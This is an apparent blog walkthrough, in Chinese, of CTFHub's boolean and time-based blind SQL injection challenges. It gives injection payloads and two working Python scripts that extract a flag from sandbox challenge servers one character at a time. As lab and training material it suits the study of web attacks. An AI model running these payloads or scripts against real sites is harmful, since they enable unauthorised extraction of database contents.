zoukankan      html  css  js  c++  java
  • CTFHub_技能树_SQL注入Ⅰ

    SQL注入

    布尔盲注

    查看页面:

    bool_sql

    尝试输入测试信息:

    bool_sql_1

    bool_sql_2

    提示为布尔注入,构造相应payload:

    ?id=1 and ascii(substr((select database()),1,1))>108

    发现不管是否返回数据,都会显示query_success

    根据老哥们的提示,得到一个骚操作:

    ?id=if(ascii(substr((select flag from flag),1,1))=99,1,(select table_name from information_schema.tables))

    如果判断正确则返回query_error;如果判断错误则构造错误查询语句,返回query_error

    python脚本如下:

    import requests
    table = ""
    list_1 = [element for element in range(48,58)]
    list_2 = [element for element in range(97,126)]
    list_0 = list_1 + list_2
    
    session = requests.session()
    url = "http://challenge-4f5472e95739be70.sandbox.ctfhub.com:10080/"
    
    for i in range(1,50):
        print(i)
        for j in list_0:
            payload = "if(ascii(substr((select flag from flag),%d,1))=%d,1,(select table_name from information_schema.tables))"%(i,j)
            str_get = session.get(url=url + '?id=' + payload).text
            if 'query_success' in str_get:
                table += chr(j)
                print(table)
                break
    

    bool_sql_3

    时间盲注

    进行简单测试

    time_sql_1time_sql_2

    发现没有任何回显,只能使用时间盲注。

    脚本如下:

    import requests
    import time
    
    session = requests.session()
    url = "http://challenge-76a4dfec7c13446d.sandbox.ctfhub.com:10080"
    table = ""
    
    list_1 = [element for element in range(48,58)]
    list_2 = [element for element in range(97,126)]
    list_0 = list_1 + list_2
    
    for i in range(1, 50):
        print(i)
        for j in list_0:
            # payload = "1 and if(substr(database(),%d,1) ='%s',sleep(1),1)"%(i, chr(j))
            payload = "1 and if(substr((select flag from flag),%d,1) = '%s',sleep(1),1)"%(i, chr(j))
            start_time = time.time()
            str_get = session.get(url=url + '?id=' + payload).text
            end_time = time.time()
            t = end_time - start_time
            if t > 1:
                table += chr(j)
                print(table)
                break
    
    

    得到flag:

    time_sql_3

  • 相关阅读:
    操作系统概述总结
    string类的用法总结
    stack的简单用法总结
    递归用法总结
    C语言中常见的图形打印总结
    C++中list的用法总结
    STL中find和sort的用法总结
    unity Physics/Physics2DProjectSettings中LayerCollisionMatrix的存储方式
    UnityEvent<T> 系列化
    十字相乘法
  • 原文地址:https://www.cnblogs.com/chalan630/p/12521576.html
Copyright © 2011-2022 走看看